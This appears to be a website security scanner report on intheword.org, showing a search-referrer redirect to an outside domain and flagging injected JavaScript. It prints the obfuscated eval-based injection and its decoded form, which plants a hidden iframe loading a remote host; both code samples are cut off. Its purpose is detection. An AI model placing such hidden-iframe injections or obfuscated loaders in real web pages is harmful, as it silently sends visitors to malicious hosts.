Malicious/Suspicious Redirects
Request:
URL: http://intheword.org/ (imitation of visitor from search engine)
GET / HTTP/1.1
Host: intheword.org
Referer: http://www.google.com/search?q=redirect+check1

Server response:
HTTP/1.1 302 Found
Connection: close
Date: Fri, 16 Oct 2015 10:01:29 GMT
Location: http://mediciron.ru/
Server: Apache/2.2
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: X-Mapping-ahelpkbl=E398875A7747C0F48D9C27CE1BF426DC; path=/

Status: malicious

Scanned pages/files
Request | Server response | Status |
http://intheword.org/ | 200 OK Content-Length: 3477 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)

if(window.document)aa=/s/g.exec("s").index+[];aaa='0';if(aa.indexOf(aaa)===0){ss='';try{if(/12/.exec(23).index==0);}catch(qqq){s=String;}ee='e';e=window.eval;t='y';}h=2*Math.cos(Math.PI);n=[3.5,3.5,51.5,50,15,19,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,19.5,60.5,3.5,3.5,3.5,51.5,50,56,47.5,53.5,49.5,56,19,19.5,28.5,3.5,3.5,61.5,15,49.5,53,56.5,49.5,15,60.5,3.5,3.5,3.5,

Decoded script:

if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("<iframe src='http://knyshp.changeip.net/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
    var f = document.createElement('iframe');
    f.setAttribute('src','http://knyshp.changeip.net/?go=2');
    f.style.visibility='hidden';
    f.style.position='absolute';
    f.style.left='0';
    f.style.top='0';
    f.setAttribute('width','10');
    f.setAttri

<iframe src='http://knyshp.changeip.net/?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

Antivirus reports:
http://intheword.org/coolRedirect.js | 200 OK Content-Length: 5715 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) |